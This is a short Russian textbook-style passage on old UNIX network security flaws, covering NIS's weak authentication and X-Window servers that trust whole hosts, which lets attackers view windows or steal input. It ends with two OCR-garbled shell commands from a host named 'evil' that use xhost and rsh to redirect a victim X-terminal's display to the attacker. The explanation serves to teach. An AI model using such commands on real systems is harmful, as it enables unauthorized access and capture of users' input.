Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
Почти не имела аутентификации клиентов и серверов, и если атакующий
Управлял активным NIS-сервсром, то он также мог бы эффективно управлять
Хостами клиентов (например, выполнять произвольные команды).
Особенности безопасности X-Window
Оконная система UNIX, в отличие от оконной системы другой фирмы, явля-1
Ется сетевой, поддерживающей сервер и клиента. Ее наличие на компьютере
Может быть обнаружено, в частности, с помощью сканирования портов. Порт
X-Window - обычно 6000.
Сервер X-Window аутентифицировал своих клиентов только по имени хоста, с
которого они подключались. Если же он "доверял" всем хостам, то его окна
Могли быть захвачены или просмотрены, ввод пользователя мог быть украден,
Программы могли быть удаленно выполнены и т. п. Одним из методов
Определения уязвимости Х-сервера является подсоединение к нему через
Функцию XOpenDisplay(). Если функция возвращает не NULL, то доступ можно
Получить.
Х-терминалы, гораздо менее мощные системы, имели свои проблемы по части
Безопасности. Многие Х-терминалы разрешали неограниченный rsh-доступ,
Позволяя запустить Х-клиенты на терминале victim, перенаправляя вывод на
локальный терминал:
evil% xhost +xvictim. victim, com
evil% rsh xvictim.victim.corn telnet victim.corn -display evil. corn
Дата публикования: 2014-11-04; Прочитано: 346 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!